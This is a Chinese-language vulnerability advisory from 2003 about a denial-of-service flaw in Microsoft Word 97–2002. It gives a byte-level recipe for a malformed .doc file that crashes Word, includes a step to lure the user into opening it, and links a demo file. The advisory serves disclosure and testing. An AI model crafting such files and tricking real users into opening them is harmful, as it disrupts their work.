Microsoft Word畸形文挡远程拒绝服务攻击漏洞
发布日期:2003-10-03
更新日期:2003-10-13
受影响系统:Microsoft Word 98
Microsoft Word 97 SR2
Microsoft Word 97 SR1
Microsoft Word 97
Microsoft Word 2002 SP2
Microsoft Word 2002 SP1
Microsoft Word 2000 SR2
Microsoft Word 2000 SR1a
Microsoft Word 2000 SR1
Microsoft Word 2000 SP2
Microsoft Word 2000
Microsoft Word 2002
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
描述:
BUGTRAQ ID:
8761
Microsoft Word是一款流行的文字编辑软件。
Microsoft Word不正确处理畸形WORD文件,远程攻击者可以利用这个漏洞诱使用户打开文档,使Word应用程序崩溃。
攻击者可以修改WORD文档结构,通过WEB和EMAIL诱使用户打开,可导致WORD处理程序在解析时崩溃,产生拒绝服务。
<*来源:Bahaa Naamneh (
b_naamneh@hotmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Bahaa Naamneh (
b_naamneh@hotmail.com)提供了如下测试方法:
1,打开Word文档。
2,保存.doc文件。
3,按照如下方法修改.doc文档:
从Microsoft Word 2002(10.2627.3311) .doc文件中查找如下行:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
4,把上面数据更改为:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
5,诱使用户打开。
演示程序如下:
http://www12.brinkster.com/bsecurity/Doc1.doc建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3171
严重程度:0(网友投票)